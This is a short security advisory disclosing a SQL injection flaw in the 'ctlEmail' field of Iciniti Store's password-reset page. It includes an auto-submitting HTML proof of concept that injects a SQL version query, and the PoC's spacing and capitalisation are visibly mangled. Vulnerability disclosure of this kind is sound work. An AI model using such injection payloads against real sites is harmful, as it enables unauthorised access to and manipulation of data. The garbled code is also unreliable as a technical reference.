Sense of Security-Security Advisory-SOS-12-003
Affected products: Iciniti Store
Platform: Windows
Affected Version 4.3.20.3.31484 has been confirmed, other versions may also
High Level
Manipulation of data
Remote unauthenticated by attackers
Solution: Contact Iciniti for upgrade
Note
Iciniti Store is a web application providing e-commerce and payment
Solutions. The application suffers from a SQL injection vulnerability
In logon_forgot_password.aspx. It fails to validate data supplied in
The 'ctlemail' variable before being used in an SQL query.
Proof of Concept.
<Html>
<Head> <Body onLoad = javascript: document. form. submit ()>
<Form action = "http://www.bkjia.com/logon_forgot_password.aspx" name = "form"
Method = "POST">
<Input type = "text" name = "ctlEmail" value = "SELECT @ VERSION">
<Input type = "text" name = "btnSubmit" value = "Submit">
</Form>
</Body>
</Html>